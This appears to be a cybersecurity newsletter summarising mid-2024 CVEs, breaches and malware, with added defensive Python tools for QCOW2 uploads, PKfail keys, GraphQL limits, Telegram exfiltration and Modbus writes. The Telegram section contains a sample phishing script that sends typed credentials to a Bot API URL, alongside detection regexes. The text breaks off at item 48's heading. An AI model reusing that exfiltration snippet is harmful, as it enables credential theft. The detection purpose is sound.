Welcome back to VulnVerse! It's our fourth weekly dispatch, and we’re here to deliver another power-packed edition. Let’s dive into the latest vulnerabilities, exploits, and cyber threats.
Contents
Vulnerabilities and Exploits: 1 to 24
Data Breaches: 25 to 34
Malware and Ransomware: 35 to 41
Software and System Issues: 42 to 44
Cybersecurity Measures, Recommendations and Law: 45 to 49
Advanced Persistent Threats (APT): 50 to 55
Vulnerabilities and Exploits
First up, we’re diving into the freshest vulnerabilities and exploits. Here’s what you need to know to stay armed and dangerous:
CVE-2024-39907: SQL Injection Vulnerability in 1Panel [1]
A critical SQL injection vulnerability (CVE-2024-39907) in 1Panel allows remote code execution and arbitrary file writes. With a CVSS score of 9.8, this flaw impacts version v1.10.9-tls. Users should upgrade to v1.10.12-tls immediately due to an available public proof-of-concept (PoC).
XXE Vulnerability in Laravel v11.x (CVE-2024-40075) [2]
A significant XXE vulnerability (CVE-2024-40075) has been found in Laravel v11.x, allowing attackers to execute arbitrary commands. This flaw is linked to the __destruct function in the Monolog\Handler\Handler class. Users should update to the latest version to secure their applications.
Docker Vulnerability [3]
A severe Docker Engine vulnerability, CVE-2024-41110, allows attackers to bypass authentication via crafted API requests, leading to unauthorized actions. Docker has released patches, and users should update immediately. If updates aren't possible, disable AuthZ plugins and restrict API access. Regular updates and security vigilance are essential.
LiteSpeed Cache Plugin Vulnerability [4]
A vulnerability (CVE-2024-3246) in the LiteSpeed Cache plugin for WordPress could allow attackers to inject malicious code via CSRF attacks. The flaw affects over 5 million websites. Administrators should update to version 6.3 to mitigate risks. Regular updates and security best practices are essential to protect websites from such vulnerabilities.
Telegram Zero-Day Allowed Sending Malicious Android APKs as Videos [5]
A zero-day vulnerability in Telegram for Android allowed attackers to send malicious APK files disguised as videos. ESET researchers discovered the flaw, which was patched in version 10.14.5. Users should update to the latest version and scan their devices for malicious files. This incident underscores the importance of timely software updates and vigilant monitoring of application vulnerabilities.
BIND DNS Vulnerabilities [6]
Multiple vulnerabilities in BIND 9 could let remote attackers exhaust resources or destabilize a DNS server with crafted traffic, leading to denial-of-service conditions. Among them, CVE-2024-0760 can be triggered remotely by a flood of DNS messages over TCP. ISC has released fixed versions for the affected 9.16, 9.18, and 9.19 branches; check the ISC advisories for the exact affected and fixed versions of the branch you run. Users should update immediately and back up configurations before applying patches to ensure DNS service stability.
GitLab XSS Vulnerability [7]
GitLab patched a high-severity cross-site scripting (XSS) vulnerability (CVE-2024-5067) affecting all versions from 16.6 before 17.0.5, 17.1 before 17.1.3, and 17.2 before 17.2.1, allowing attackers to execute arbitrary scripts in a victim's browser. The updated versions 17.2.1, 17.1.3, and 17.0.5 address this and other vulnerabilities. Users should update their GitLab installations promptly. Regular security audits and output-encoding discipline in application code can mitigate the risks of XSS and other vulnerabilities.
Progress Telerik Report Server Vulnerability CVE-2024-6327 [8]
A critical flaw in Progress Telerik Report Server (CVE-2024-6327) allows remote code execution due to insecure deserialization. Rated with a CVSS score of 9.9, it affects versions before 2024 Q2 (10.1.24.709). Progress Software has released an update to address the issue, urging users to upgrade immediately. A temporary mitigation involves changing the Report Server Application Pool user account to one with limited permissions. Users should verify their current version and update as necessary.
Windows File Immutability Vulnerability [9]
A newly discovered vulnerability in the Windows 11 Kernel, termed "File Immutability," allows threat actors to execute arbitrary code with Kernel privileges. The vulnerability exploits incorrect assumptions in the Core Windows feature design. Organizations must employ comprehensive security measures, including secure remote access and regular vulnerability assessments, to mitigate such risks.
OpenStack Nova Vulnerability Allows Hackers Gain Unauthorized Access to Cloud Servers [10]
A critical vulnerability (CVE-2024-40767) in OpenStack's Nova allows authenticated users to read arbitrary files from the underlying compute host by uploading a crafted QCOW2 image whose backing-file field points at a host path. Discovered by Arnaud Morin of OVH, it affects specific Nova versions; urgent patching is necessary to prevent security breaches.
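The QCOW2 header declares an optional backing file, and that is the field this class of bug abuses: an uploaded image should never reference anything on the host. The following is an added example, not code from the Nova project or its fix (Nova's own remediation inspects images with qemu-img); it is a stand-alone upload gate that parses the header fields from the qcow2 specification and rejects any image that carries a backing file. The helper that builds test images and the `/etc/shadow` path are constructed for illustration.

```python
import struct
from typing import Optional

# QCOW2 header start (big-endian), per the QEMU qcow2 specification:
# magic "QFI\xfb" (4), version (4), backing_file_offset (8), backing_file_size (4)
QCOW2_MAGIC = b"QFI\xfb"
HEADER_FMT = ">4sIQI"
HEADER_LEN = struct.calcsize(HEADER_FMT)  # 20 bytes
V3_HEADER_LEN = 104                        # full version-3 header, used by the test builder


def qcow2_backing_file(image: bytes) -> Optional[str]:
    """Return the backing-file path declared in a QCOW2 header, or None if absent.

    Raises ValueError for data that is not QCOW2 or whose backing-file field
    points outside the file; an upload gate should treat both as a rejection.
    """
    if len(image) < HEADER_LEN:
        raise ValueError("too short to be a QCOW2 image")
    magic, version, bf_off, bf_size = struct.unpack(HEADER_FMT, image[:HEADER_LEN])
    if magic != QCOW2_MAGIC:
        raise ValueError("not a QCOW2 image")
    if version not in (2, 3):
        raise ValueError(f"unsupported qcow2 version {version}")
    if bf_off == 0 and bf_size == 0:
        return None  # no backing file: the only acceptable state for a user upload
    # The spec caps the backing file name at 1023 bytes; anything else is malformed.
    if bf_size > 1023 or bf_off + bf_size > len(image):
        raise ValueError("backing-file field points outside the image")
    return image[bf_off:bf_off + bf_size].decode("utf-8", errors="replace")


def is_safe_to_import(image: bytes) -> bool:
    """Upload gate: accept only well-formed QCOW2 images with no backing file."""
    try:
        return qcow2_backing_file(image) is None
    except ValueError:
        return False


def make_qcow2(backing: Optional[bytes]) -> bytes:
    """Build a minimal, non-bootable QCOW2 header for testing (constructed data)."""
    padding = b"\x00" * (V3_HEADER_LEN - HEADER_LEN)
    if backing is None:
        return struct.pack(HEADER_FMT, QCOW2_MAGIC, 3, 0, 0) + padding
    # Place the backing-file name right after the header, as qemu-img does.
    return struct.pack(HEADER_FMT, QCOW2_MAGIC, 3, V3_HEADER_LEN, len(backing)) + padding + backing


if __name__ == "__main__":
    hostile = make_qcow2(b"/etc/shadow")  # constructed: a host path an attacker might target
    print("hostile image backing file:", qcow2_backing_file(hostile))
    print("safe to import:", is_safe_to_import(hostile), is_safe_to_import(make_qcow2(None)))
```

Run this on every image before it reaches the compute host, and keep the `qemu-img info` check as well: the header parser is cheap and catches the obvious case, but only the real tool understands every qcow2 extension.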
Windows Hello for Business Authentication Bypass [11]
A design flaw in Microsoft’s Windows Hello for Business allowed attackers to bypass secure authentication by downgrading to less secure methods. Discovered by Yehuda Smirnov, the exploit intercepts and alters authentication requests. Microsoft advises implementing conditional access policies, strong MFA, and monitoring to mitigate this vulnerability.
ConfusedFunction Vulnerability in Google Cloud Platform Let Attackers Escalate Privileges [12]
A vulnerability known as "ConfusedFunction" in Google Cloud Platform's Cloud Functions and Cloud Build services could allow attackers to escalate privileges and access various GCP services. Discovered by Tenable Research, this flaw arises from excessive permissions of the default Cloud Build service account. Google has partially remediated the issue for accounts created after mid-June 2024. Users should replace legacy Cloud Build service accounts with least-privilege accounts and monitor their environments for potential exploitation.
PKfail Vulnerability Allows Hackers to Install UEFI Malware on Over 200 Device Models [13]
The PKfail vulnerability compromises over 200 device models by exploiting untrusted Platform Keys (PKs) used in the UEFI Secure Boot process. This issue allows attackers to bypass Secure Boot and install persistent malware. Affected vendors include Acer, Dell, Fujitsu, HP, Intel, Lenovo, and Supermicro. Device vendors should replace test keys with securely generated ones and issue firmware updates. Users must apply these updates and use tools like the PKfail scanner to detect vulnerabilities.
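The leaked AMI test keys behind PKfail carry strings such as "DO NOT TRUST" in the certificate subject, which is what the published scanners key on. The following is an added example, not the PKfail scanner or any vendor's code: it reads the PK variable from Linux efivarfs, walks the EFI_SIGNATURE_LIST structure from the UEFI specification, and flags any X.509 entry that contains a known test-key marker. The marker list and the `build_esl` test helper (which wraps a constructed blob, not a real certificate) are assumptions for illustration; the real check should also compare against the published list of known-bad key hashes.

```python
import struct
import uuid
from pathlib import Path
from typing import Iterator, List

# EFI_GLOBAL_VARIABLE GUID; on Linux the PK variable is exposed as
# /sys/firmware/efi/efivars/PK-<guid> with 4 attribute bytes prepended.
EFI_GLOBAL_VARIABLE = "8be4df61-93ca-11d2-aa0d-00e098032b8c"
PK_EFIVAR = Path(f"/sys/firmware/efi/efivars/PK-{EFI_GLOBAL_VARIABLE}")
EFI_CERT_X509_GUID = uuid.UUID("a5c059a1-94e4-4aa7-87b5-ab155c2bf072")

# Substrings seen in the subject of the leaked test Platform Keys (assumed list).
UNTRUSTED_MARKERS = (b"DO NOT TRUST", b"DO NOT SHIP")

ESL_HEADER = struct.Struct("<16sIII")  # SignatureType, ListSize, HeaderSize, SignatureSize


def iter_signature_data(esl: bytes) -> Iterator[bytes]:
    """Walk consecutive EFI_SIGNATURE_LIST structures and yield the data of
    each X.509 entry (the DER certificate after the 16-byte SignatureOwner)."""
    pos = 0
    while pos + ESL_HEADER.size <= len(esl):
        sig_type_raw, list_size, hdr_size, sig_size = ESL_HEADER.unpack_from(esl, pos)
        sig_type = uuid.UUID(bytes_le=sig_type_raw)
        if list_size < ESL_HEADER.size or pos + list_size > len(esl) or sig_size <= 16:
            raise ValueError("malformed EFI_SIGNATURE_LIST")
        entries = esl[pos + ESL_HEADER.size + hdr_size: pos + list_size]
        for i in range(0, len(entries) - sig_size + 1, sig_size):
            if sig_type == EFI_CERT_X509_GUID:
                yield entries[i + 16:i + sig_size]
        pos += list_size


def untrusted_pk_certs(esl: bytes) -> List[bytes]:
    """Return every X.509 entry in a PK signature list that carries a test-key marker."""
    return [cert for cert in iter_signature_data(esl)
            if any(marker in cert for marker in UNTRUSTED_MARKERS)]


def read_pk_efivar() -> bytes:
    """Read the live PK variable (Linux efivarfs) and strip the 4 attribute bytes."""
    return PK_EFIVAR.read_bytes()[4:]


def build_esl(cert_der: bytes) -> bytes:
    """Wrap one blob in a single X.509 EFI_SIGNATURE_LIST (test helper, constructed data)."""
    sig_size = 16 + len(cert_der)
    list_size = ESL_HEADER.size + sig_size
    header = ESL_HEADER.pack(EFI_CERT_X509_GUID.bytes_le, list_size, 0, sig_size)
    return header + uuid.uuid4().bytes_le + cert_der


if __name__ == "__main__":
    bad = untrusted_pk_certs(read_pk_efivar())
    print("PKfail: an untrusted test Platform Key is enrolled" if bad
          else "PK carries no known test-key marker")
```

The substring match is deliberately simple so it needs no X.509 library; a hit is conclusive, but a miss only means the enrolled key is not one of the AMI test keys, not that the key is trustworthy.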
CVE-2024-40897: Vulnerability in Orc Compiler Opens Door to Code Execution Attacks [14]
A critical vulnerability (CVE-2024-40897) in the Orc compiler has been disclosed, which could enable attackers to execute arbitrary code. The flaw, caused by a stack-based buffer overflow error, is of particular concern for developers and CI environments. The Orc project maintainers have released version 0.4.39 to address this issue. Developers are strongly advised to update immediately to prevent potential exploitation and ensure the integrity of their development environments.
Critical ServiceNow RCE flaws actively exploited to steal credentials [15]
Threat actors are exploiting ServiceNow flaws, specifically CVE-2024-4879, CVE-2024-5178, and CVE-2024-5217, to breach systems and steal credentials. Chained together, these flaws allow remote code execution and database access. Although patches were released on July 10, many systems remain vulnerable. Organizations should immediately apply the patches to prevent data theft and further exploitation. Regular updates and monitoring for signs of compromise are essential to maintaining security.
BookingPress WordPress Plugin Vulnerabilities [16]
The BookingPress WordPress plugin has multiple vulnerabilities allowing authenticated attackers to create arbitrary files, update site options, and upload arbitrary files, leading to potential site compromise. Affected versions are up to 1.1.5. Users should update to version 1.1.6 and apply security measures like using Wordfence, enforcing least privilege principles, and regularly updating software to protect against these exploits.
GraphQL Security Report 2024: 69% of API Services Were Susceptible to DoS Attacks [17]
A report on GraphQL security reveals significant vulnerabilities, including unrestricted resource consumption, security misconfigurations, and exposed secrets. To improve security, organizations should implement access control, input validation, rate limiting, and schema whitelisting. Adopting these best practices can help protect against DoS attacks and other threats.
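Unrestricted resource consumption in GraphQL usually comes from two shapes of query: deep nesting (each level multiplies resolver calls) and alias batching (one request repeating an expensive field many times). The following is an added example, not code from the report: a pre-parse cost check that scans a query document for maximum selection-set depth and aliased-field count, skipping strings and comments so their braces and colons are not miscounted. The limits, the `should_reject` gate, and the three sample queries are constructed for illustration; in production this sits in front of the real parser, which still does the full validation.

```python
from typing import Dict


def graphql_cost(query: str) -> Dict[str, int]:
    """Return the maximum selection-set depth (the outermost `{` counts as 1) and
    the number of aliased fields in a GraphQL document.

    Comments and strings are skipped, and colons inside argument lists (parentheses)
    are ignored, so `user(id: 1)` is not mistaken for an alias."""
    depth = max_depth = aliases = parens = 0
    i, n = 0, len(query)
    while i < n:
        c = query[i]
        if c == "#":                              # comment runs to end of line
            while i < n and query[i] != "\n":
                i += 1
            continue
        if c == '"':                              # block string or plain string
            if query.startswith('"""', i):
                end = query.find('"""', i + 3)
                i = n if end < 0 else end + 3
            else:
                i += 1
                while i < n and query[i] != '"':
                    i += 2 if query[i] == "\\" else 1   # skip escaped characters
                i += 1
            continue
        if c == "(":
            parens += 1
        elif c == ")":
            parens -= 1
        elif c == "{":
            depth += 1
            max_depth = max(max_depth, depth)
        elif c == "}":
            depth -= 1
        elif c == ":" and parens == 0 and depth > 0:
            aliases += 1                          # `alias: field` inside a selection set
        i += 1
    if depth != 0:
        raise ValueError("unbalanced braces")
    return {"depth": max_depth, "aliases": aliases}


def should_reject(query: str, max_depth: int = 10, max_aliases: int = 20) -> bool:
    """Gate to run before the real parser; malformed documents are rejected outright."""
    try:
        cost = graphql_cost(query)
    except ValueError:
        return True
    return cost["depth"] > max_depth or cost["aliases"] > max_aliases


# Constructed sample queries (not taken from the report).
NESTED = "query { user(id: 1) { friends { friends { friends { friends { name } } } } } }"
ALIASED = "{ " + " ".join(f'a{i}: login(user: "u", pw: "p{i}")' for i in range(50)) + " }"
NORMAL = 'query Q($id: ID!) { user(id: $id) { name # comment { ignored\n email } }'

if __name__ == "__main__":
    for name, q in (("nested", NESTED), ("aliased", ALIASED), ("normal", NORMAL)):
        print(name, graphql_cost(q), "reject" if should_reject(q, max_depth=5) else "accept")
```

Depth and alias counts are only two of the cost dimensions; pair this with per-resolver rate limiting and a query allowlist (persisted queries) for clients you control.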
JetBrains TeamCity Vulnerability [18]
A high-severity vulnerability (CVE-2024-41827) in JetBrains TeamCity allows deleted or expired access tokens to remain functional, posing significant risks to CI/CD systems. Users must update to the latest version and enhance monitoring and detection to mitigate potential unauthorized access and privilege escalation. Immediate patching is crucial to protect sensitive information and maintain system integrity.
Progress warns of critical RCE bug in Telerik Report Server [19]
Progress Software has flagged a serious remote code execution vulnerability in Telerik Report Server (CVE-2024-6327). This issue stems from insecure deserialization of untrusted data, enabling attackers to execute malicious code on vulnerable servers. Versions affected include Report Server 2024 Q2 (10.1.24.514) and earlier. Users are urged to upgrade to version 2024 Q2 (10.1.24.709) or apply temporary mitigations.
Siemens Patches Critical Vulnerabilities in SICAM Products [20]
Siemens has released crucial firmware updates to fix critical security flaws in its SICAM products, including unauthorized password resets and firmware downgrade vulnerabilities. These issues could lead to privilege escalation and data leaks. Affected products include SICAM A8000 and SICAM EGS. Siemens advises users to update their firmware and enhance security measures by disabling auto-login and securing network access with firewalls.
MonoSwap Hack [21]
MonoSwap, a liquidity protocol, suffered a hack after a developer installed a phishing app, leading to significant loss of staked liquidity. The attackers gained access to wallets and contracts via a botnet. MonoSwap's inadequate security measures, such as lack of audits and over-reliance on a single executive’s access, contributed to the breach. Strengthening security protocols, conducting regular audits, and distributing critical access can help prevent similar incidents.
Hackers Abuse Swap File In Shopping Sites To Inject Credit Card Skimmer [22]
Hackers exploited the swap file mechanism in Magento e-commerce platforms to inject persistent credit card skimmers. This method allows malware to survive multiple removal attempts. To counter this, e-commerce sites should deploy comprehensive security measures, restrict administrative access, use firewalls, and regularly update their systems and plugins to detect and remove such malware.
Threat Actors Using Telegram APIs To Steal Login Credentials [23]
Threat actors are exploiting Telegram APIs to steal login credentials through phishing emails and deceptive landing pages. These pages use JavaScript to exfiltrate user data to Telegram bots. Users should avoid clicking on suspicious links, employ robust email filtering, and educate employees about phishing risks. Organizations should implement multi-factor authentication and monitor for unusual activity to mitigate the impact of such attacks.
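Because these kits post stolen data straight to the Telegram Bot API, the exfiltration call has a fixed shape (`api.telegram.org/bot<id>:<secret>/<method>`) that is easy to hunt for in captured page source, sandbox HTTP traces, or web-proxy logs. The following is an added example, not code from the report: a scanner that finds such calls, extracts the bot id, method and any `chat_id` (the attacker's inbox), and redacts the secret so the finding can be shared. The phishing-page snippet and proxy log line are constructed, the token format is the commonly observed one, and the list of exfiltration methods is an assumption.

```python
import re
from typing import Dict, List

# Bot API calls look like https://api.telegram.org/bot<numeric id>:<secret>/<method>.
# We match on that shape only; the sample tokens below are made up.
TELEGRAM_BOT_RE = re.compile(
    r"api\.telegram\.org/bot(?P<bot_id>\d{6,12}):(?P<secret>[A-Za-z0-9_-]{30,})/(?P<method>\w+)"
)
CHAT_ID_RE = re.compile(r"chat_id[=\"':\s]+(?P<chat_id>-?\d{5,})")

# Methods that carry data *to* the attacker; anything else (getMe, getUpdates) is recon.
EXFIL_METHODS = {"sendMessage", "sendDocument", "sendPhoto"}


def find_telegram_exfil(text: str) -> List[Dict[str, str]]:
    """Scan page source, a sandbox capture or proxy log text for Telegram Bot API
    calls; return one finding per call with the bot secret redacted."""
    findings = []
    for m in TELEGRAM_BOT_RE.finditer(text):
        window = text[m.end(): m.end() + 400]   # the chat_id usually follows the URL
        chat = CHAT_ID_RE.search(window)
        findings.append({
            "bot_id": m.group("bot_id"),
            "token_redacted": f'{m.group("bot_id")}:{m.group("secret")[:4]}...',
            "method": m.group("method"),
            "chat_id": chat.group("chat_id") if chat else "",
            "severity": "high" if m.group("method") in EXFIL_METHODS else "info",
        })
    return findings


# Constructed phishing-page script, mimicking the pattern described above.
SAMPLE_PHISH_JS = """
document.getElementById('login').onsubmit = function (e) {
  e.preventDefault();
  var msg = 'user=' + user.value + ' pass=' + pass.value;
  fetch('https://api.telegram.org/bot1234567890:AAEx4mpl3S3cr3tT0k3nPart_NotReal00/sendMessage?chat_id=-1001234567890&text=' + encodeURIComponent(msg));
};
"""

# Constructed proxy log line: a host talking to the Bot API is worth a look even when
# the method is not an exfil one.
SAMPLE_PROXY_LOG = ("2024-07-26T10:14:03Z 10.0.4.17 GET "
                    "https://api.telegram.org/bot9876543210:AAFf4k3S3cr3tF0rD3m0Purp0s3s0nly_XYZ/getMe 200")

if __name__ == "__main__":
    for finding in find_telegram_exfil(SAMPLE_PHISH_JS + SAMPLE_PROXY_LOG):
        print(finding)
```

On the network side, the same regex applied to TLS SNI or proxy URLs flags any client that talks to `api.telegram.org` with a bot token, which ordinary user traffic from the Telegram app never does.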
Hackers Bypass Secure Email Gateways [24]
Hackers have exploited vulnerabilities in Secure Email Gateways (SEGs) by sending corrupted .zip archives, allowing malware like FormBook to bypass detection. These archives contain HTML files with .Mpeg extensions, evading SEG scans. Organizations should enhance SEG configurations, monitor for unusual file types, and educate employees about the risks of opening suspicious attachments.
Data Breaches
Next, we wade through the murky waters of recent data breaches. These aren’t just headlines – they’re crucial lessons on what can go wrong and how to bolster your defenses.
Red Art Games Hit by Major Cyberattack, Customer Data Exposed [25]
Red Art Games has suffered a large-scale cyberattack, compromising customer data including names, birth dates, email addresses, shipping information, and phone numbers. Order processing is suspended during the investigation. Banking information remains secure. Customers should change their account passwords and stay alert for phishing attempts.
10 Million Users Compromised in Z-Library Phishing Site Hack [26]
The popular pirate e-book site Z-Library, or its phishing clone Z-lib, suffered a data breach affecting nearly 10 million users. Cybernews discovered an exposed database containing information on 9,761,948 users, including personal information, passwords, cryptocurrency wallet addresses, and payment details. The breach occurred due to the cybercriminals’ web server having directory listing enabled. Affected users are advised to change passwords, block malicious email addresses, and secure their cryptocurrency wallets.
Hackers Leak Sensitive Documents from Major Pentagon IT Contractor, Leidos [27]
Cybercriminals have leaked internal documents stolen from Leidos Holdings Inc., a major IT service provider for the U.S. government. The documents were stolen due to a previously disclosed breach of Diligent Corp.’s system. This incident did not impact Leidos' network or any confidential client data. The data leak has raised concerns due to Leidos' extensive work with the Department of Defense, the Department of Homeland Security, and NASA.
Michigan Medicine Data Breach [28]
Michigan Medicine experienced a data breach affecting 57,000 patients, exposing personal and health information through compromised employee email accounts. The organization has notified affected individuals and taken measures to block the attackers' IP and reset passwords. Patients should monitor their accounts for suspicious activity. Organizations should strengthen email security and employee training to prevent similar breaches.
Leidos Data Breach [29]
Hackers leaked documents from Leidos Holdings, a major IT services provider to the U.S. government. The breach, linked to a 2022 incident involving Diligent Corp., raises concerns over the security of sensitive government data managed by third-party contractors. Leidos is investigating the breach and emphasizes that its network and sensitive customer data were not affected.
Record Cyberattack: Suffolk County's $25.7M Recovery Plan [30]
Suffolk County, New York, has approved $25.7 million for recovery efforts following a cyberattack by the ALPHV/BlackCat group. The attack exposed personal data of 470,000 residents and 26,000 employees. Recovery includes contracts through the end of 2024 and significant expenses directed towards system support and forensic investigations.
Verizon to Pay $16 Million in TracFone Data Breach Settlement [31]
Verizon agreed to a $16 million settlement over data breaches at its subsidiary TracFone. The breaches involved unauthorized access to customer data and SIM-swapping incidents. Verizon will implement enhanced security measures, including API vulnerability reduction and SIM change protections, to safeguard customer information.
Greece’s Land Registry Breach [32]
Greece’s Land Registry faced a data breach after 400 cyberattacks, resulting in the theft of 1.2 GB of non-sensitive administrative data. The agency blocked further data exfiltration attempts and implemented emergency measures like VPN access termination and mandatory two-factor authentication. Enhancing cybersecurity defenses and monitoring for ongoing threats is crucial to prevent similar breaches.
dYdX Website Compromised [33]
The website for dYdX's v3 trading platform was compromised in a DNS hijacking attack, leading users to a phishing site that attempted to steal tokens. The attack exploited vulnerabilities in the Squarespace registrar used by the platform. dYdX has regained control and advises users to restart browsers and clear caches. This incident highlights the importance of robust domain security practices and prompt incident response.
Extensive spyware compromise revealed by Spytech breach [34]
A breach at Spytech exposed data from over 10,000 devices compromised with Realtime-Spy and SpyAgent spyware tools. The incident revealed unencrypted activity logs and affected devices, predominantly in the U.S. and Europe. Spytech is investigating the breach. Users should verify their devices and utilize tools like Have I Been Pwned to check for exposure. Strong security practices and regular updates are essential to prevent spyware infections.
Malware and Ransomware
Get ready to explore the dangerous world of malware and ransomware. These threats are constantly changing, and knowing the latest can help you avoid a security disaster.
Malicious Stealer Campaign Exploits Windows SmartScreen Flaw (CVE-2024-21412) [35]
FortiGuard Labs identified a campaign leveraging CVE-2024-21412 to deliver information-stealing malware, bypassing Windows SmartScreen. The attack chain includes downloading an LNK file that leads to an executable with a malicious script, injecting final stealer malware like Meduza and ACR. Organizations must prioritize patching vulnerabilities, deploying advanced threat detection systems, and educating users about the risks of interacting with unknown links and files.
FrostyGoop Malware Attack in Ukraine [36]
In January 2024, Russian-linked FrostyGoop malware cut off heating for 600 buildings in Lviv, Ukraine, during sub-zero temperatures. The attackers exploited a Mikrotik router vulnerability, breaching the network nearly a year before the attack. The malware targeted industrial control systems using the Modbus protocol. It highlights the need for improved network segmentation and adherence to SANS 5 Critical Controls, including secure remote access and ICS network visibility.
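Modbus has no authentication, so the visibility Dragos calls for means watching the protocol itself: a write to a controller from anything other than an engineering workstation is the signal. The following is an added example, not code from Dragos or the FrostyGoop analysis: a minimal Modbus/TCP decoder (MBAP header plus function code, per the Modbus specification) and a detector that alerts on write function codes from sources outside an allowlist. The sample flows, IP addresses and register addresses are constructed; the `build_request` helper emits only the address/quantity words, enough for the detector but not a complete multi-register write.

```python
import struct
from typing import Dict, Iterable, List, Optional, Set

# Modbus/TCP MBAP header: transaction id (2), protocol id (2, always 0),
# length (2, counts unit id + PDU), unit id (1); PDU = function code (1) + data.
MBAP = struct.Struct(">HHHB")
WRITE_FUNCTIONS = {
    5: "Write Single Coil",
    6: "Write Single Register",
    15: "Write Multiple Coils",
    16: "Write Multiple Registers",
    23: "Read/Write Multiple Registers",
}


def parse_modbus_tcp(payload: bytes) -> Optional[Dict[str, object]]:
    """Decode one Modbus/TCP request; returns None for data that is not Modbus."""
    if len(payload) < MBAP.size + 1:
        return None
    tid, proto, length, unit = MBAP.unpack_from(payload, 0)
    if proto != 0 or length < 2 or length != len(payload) - 6:
        return None
    fc = payload[7]
    pdu = payload[8:]
    req: Dict[str, object] = {"tid": tid, "unit": unit, "fc": fc, "write": fc in WRITE_FUNCTIONS}
    if fc in (3, 4, 6, 16) and len(pdu) >= 4:
        # Register functions start with a 16-bit address, then a quantity or value.
        req["address"], req["count_or_value"] = struct.unpack_from(">HH", pdu, 0)
    return req


def flag_writes(flows: Iterable[Dict[str, object]], allowed_writers: Set[str]) -> List[str]:
    """Alert on Modbus writes from any source not in the engineering allowlist.
    Each flow is {"src": ip, "dst": ip, "payload": bytes}."""
    alerts = []
    for f in flows:
        req = parse_modbus_tcp(f["payload"])
        if req and req["write"] and f["src"] not in allowed_writers:
            alerts.append(f'{f["src"]} -> {f["dst"]} unit {req["unit"]}: '
                          f'{WRITE_FUNCTIONS[req["fc"]]} at 0x{req.get("address", 0):04x}')
    return alerts


def build_request(fc: int, address: int, value: int, unit: int = 1, tid: int = 1) -> bytes:
    """Constructed Modbus/TCP request for testing (not captured traffic)."""
    pdu = struct.pack(">BHH", fc, address, value)
    return MBAP.pack(tid, 0, len(pdu) + 1, unit) + pdu


# Constructed flows: an HMI reading and writing, an external host writing, and noise.
SAMPLE_FLOWS = [
    {"src": "10.10.1.5", "dst": "10.10.2.20", "payload": build_request(3, 0x0000, 10)},
    {"src": "10.10.1.5", "dst": "10.10.2.20", "payload": build_request(6, 0x0010, 0)},
    {"src": "203.0.113.9", "dst": "10.10.2.20", "payload": build_request(16, 0x0010, 2)},
    {"src": "203.0.113.9", "dst": "10.10.2.20", "payload": b"GET / HTTP/1.1\r\n"},
]

if __name__ == "__main__":
    for alert in flag_writes(SAMPLE_FLOWS, allowed_writers={"10.10.1.5"}):
        print("ALERT", alert)
```

The allowlist is the whole point: a flat network where any host can reach TCP/502 is exactly what let a router compromise become a heating outage, so the same list should drive firewall rules between the IT and ICS segments, not just alerts.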
Krampus Loader [37]
The Krampus loader, a new malware gaining popularity on the dark web, supports multiple functionalities like archiving, PowerShell scripts, and cryptocurrency mining. It evades detection by altering code on each build. Cybersecurity experts urge organizations to update security protocols and employ advanced threat detection systems. Staying informed about emerging threats and implementing proactive cybersecurity measures are essential to protect digital assets from sophisticated malware loaders like Krampus.
EvolvedAim Developer Exposed as Malware Distributor [38]
The developer of EvolvedAim, a cheat program for the game Escape From Tarkov, has been exposed for distributing malware that stole user information. Known as Mythical, the developer embedded malicious software in the cheat to steal data from users' devices, including passwords and crypto wallet files. EvolvedAim has been shut down, and Mythical has been banned from gaming forums. This case highlights the risks associated with using game cheats and the severe repercussions for both developers and users involved in such activities.
Ransomware Attack Forces Closure of LA County Courts [39]
A ransomware attack on the Superior Court of Los Angeles County led to the closure of 36 courts to restore systems. The attack compromised external and internal case management systems. The court is collaborating with local, state, and federal agencies to investigate the incident.
RA Ransomware Group Aggressively Attacking Manufacturing Sector [40]
RA World ransomware group, active since March 2024, targets the manufacturing sector using multi-extortion tactics. The group has shifted from healthcare to manufacturing, seeking higher ransom payouts. To defend against such attacks, organizations should secure internet-facing servers, implement strong access controls, and maintain regular data backups. Enhanced threat detection and response capabilities are also critical.
Stargazers Ghost Network [41]
Check Point researchers have discovered the Stargazers Ghost Network, a sophisticated network of GitHub accounts distributing malware and phishing links. Operated by Stargazer Goblin, the network uses over 3,000 accounts to create repositories with malicious links and encrypted archives, appearing legitimate through automated activities like starring and forking. This Distribution as a Service (DaaS) has been active since mid-2023, with significant activity in mid-2024. Users should be cautious of repositories with unusually high activity and ensure robust cybersecurity measures, including regular monitoring and verification of repository content.
Software and System Issues
Even the most secure systems can have problems. Here’s a look at recent software and system issues you need to know about. Stay informed and stay prepared.
OpenBSD Introduces Hardware Acceleration [42]
OpenBSD has rolled out hardware acceleration support in its latest major update, significantly enhancing performance for desktop users. The update includes video acceleration (VA-API) and integration with the libva 2.22.0 open-source library. This allows the GPU to handle hardware encoding and decoding, improving performance and battery life in browsers like Chrome and Firefox.
Windows 10 KB5040525 Update [43]
Microsoft released the July 2024 preview update for Windows 10, fixing issues with Windows Defender Application Control (WDAC) that caused app crashes and memory leaks. Users are encouraged to install the update to enhance system stability and security. This update is crucial for maintaining optimal system performance and preventing potential security vulnerabilities.
Windows 11 KB5040527 update fixes Windows Backup failures [44]
Microsoft's KB5040527 update for Windows 11 fixes issues causing Windows backups to fail on EFI systems and addresses upgrade failures and memory leaks in Windows Defender Application Control. Users can install this optional update via Windows Update or manually download it. This update also adds drivers to the Windows Kernel Vulnerable Driver Blocklist to prevent Bring Your Own Vulnerable Driver (BYOVD) attacks. Microsoft recommends updating to the latest version to ensure continued security and functionality.
Cybersecurity Measures, Recommendations and Law
What can you do about all these threats? Here are some top cybersecurity tips and recommendations to keep you one step ahead of the bad guys.
IPFire Fortifies Against SYN Flood Attacks with New Protection Feature [45]
IPFire, the open-source firewall distribution, has introduced SYN Flood Protection for its enterprise users. This feature leverages advanced SYN cookie technology to distinguish between genuine and malicious traffic, effectively filtering out illegitimate SYN packets. IPFire supports Amazon’s Graviton Instances and Elastic Network adapters, enabling high-performance, cloud-based DoS protection capable of handling hundreds of gigabits of traffic per second.
Let’s Encrypt to End OCSP Support [46]
Let’s Encrypt plans to discontinue OCSP support in favor of CRLs, enhancing user privacy and operational efficiency. Users relying on OCSP should transition to CRLs and ensure their systems are compatible with certificates lacking an OCSP URL.
Linx Security Raises $33M to Address Digital Identity Threats [47]
Linx Security raised $33 million to enhance identity security technology, which reduces attack surfaces by mapping and monitoring user identities, access, and permissions. Their advanced analytics help mitigate risks, such as detecting and revoking unsecured access to critical systems, ensuring better compliance and security.
How Cyber Insurance Coverage is Evolving [48]
